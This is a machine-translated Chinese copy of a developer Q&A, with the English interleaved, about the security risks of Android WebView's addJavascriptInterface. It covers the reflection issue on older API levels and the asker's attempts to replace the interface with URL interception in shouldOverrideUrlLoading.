Android的JavascriptInterface安全？安全、Android、JavascriptInterface

2023-09-12 23:58:31 作者：我的耳旁有你的浅唱、

从文档： http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29

使用addJavascriptInterface（）允许JavaScript来控制你的应用程序。这是一个非常有用的功能或危险的安全问题。当web视图的HTML是不可靠的（例如，部分或全部HTML是由一些提供个人或过程），那么攻击者可以注入HTML，将执行您的code 和攻击者选择的任何可能code。不要使用addJavascriptInterface（），除非所有在此的WebView的HTML的是由你。绑定运行在另一个线程，而不是在它被中构建的线程在Java对象

"Using addJavascriptInterface() allows JavaScript to control your application. This can be a very useful feature or a dangerous security issue. When the HTML in the WebView is untrustworthy (for example, part or all of the HTML is provided by some person or process), then an attacker could inject HTML that will execute your code and possibly any code of the attacker's choosing. Do not use addJavascriptInterface() unless all of the HTML in this WebView was written by you. The Java object that is bound runs in another thread and not in the thread that it was constructed in.

假设我有一个接口，只显示一个自定义对话框，或者开始一个下载到SD卡。这将是不安全的，可以用于任何网址是什么？怎么可能攻击网页使用界面运行攻击者选择的任何code？

更新：根据文档：

此方法可以用来允许JavaScript控制主机应用。这是一个强大的功能，而且还presents安全风险有针对性的API级别JELLY_BEAN或以下的应用，因为JavaScript可以使用反射来访问注入的对象公共字段。在包含不可信一个web视图使用此方法内容可能允许攻击者操纵宿主应用程序意想不到的方式，执行Java code与主机的权限应用。在web视图使用此方法时要格外小心其中可能包含不受信任的内容。

This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level JELLY_BEAN or below, because JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content.

是否有这是如何发生的例子吗？ IT这只是说， DOWNLOADINTERFACE.dangerousfunction 可以被称为如果这是在这个类的公共方法？

Is there an example of how this could happen? It this just saying that DOWNLOADINTERFACE.dangerousfunction could be called if that's a public method on that class?

更新：

Update:

我测试的基础上的攻击之下，网站的的例子可以的得到Android 4.4系统，4.1和3.2通过接口访问系统。

I tested based on the example of the exploit below, sites can get access to the system through interfaces in Android 4.4, 4.1, and 3.2.

不过，我的没有的看到在Android 2.2或2.3这个bug，黑客不仅造成的力接近。什么是prevent的最佳方式这个技巧，比不使用JSInterface其他？我可以有假的功能就是这样，到功能prevent未经授权的电话？

However, I was not seeing this bug on Android 2.2, or 2.3, the hack only causes a force-close. What is the best way to prevent this hack, other than not using JSInterface? Can I include bogus functions like this, to prevent unauthorized calling of functions?

public Object getClass() {
  //throw error, return self, or something?  
}

或重写用ajax一切，拦截电话？但愿结果更好/更差的性能？

Or rewrite everything using ajax and intercepting calls? Would that result in better/worse performance?

更新：

我成功地除去JS接口，并通过定义的window.open（specialurl）取代的功能的所有窗口的命令。（接口）的功能，并覆盖那些在shouldOverrideUrlLoading。奇怪的是，的window.open（）必须在某些情况下使用，或web视图打破显示（如JavaScript是停止），并在其他情况下location.replace应当使用，否则就会只是显示一个接口：// specialdata 找不到消息

I succeeded in removing the JS interface, and replaced the functionality by defining window.open(specialurl) commands for all the window.(interface) functions, and overriding those in the shouldOverrideUrlLoading. Strangely enough, window.open() must be used in some cases, or the webview breaks display (like javascript is stopping?), and in other cases location.replace should be used or it will just show a "interface://specialdata" could not be found message.

（我设置settings.setJavaScriptCanOpenWindowsAutomatically（真），这样的window.open作品从JS所有的时间。）

(I set settings.setJavaScriptCanOpenWindowsAutomatically(true) so window.open works from JS all the time.)

任何人都知道重写这个行为的应用程序的最佳方法是什么？

Anyone know the best way to rewrite an app with this behavior?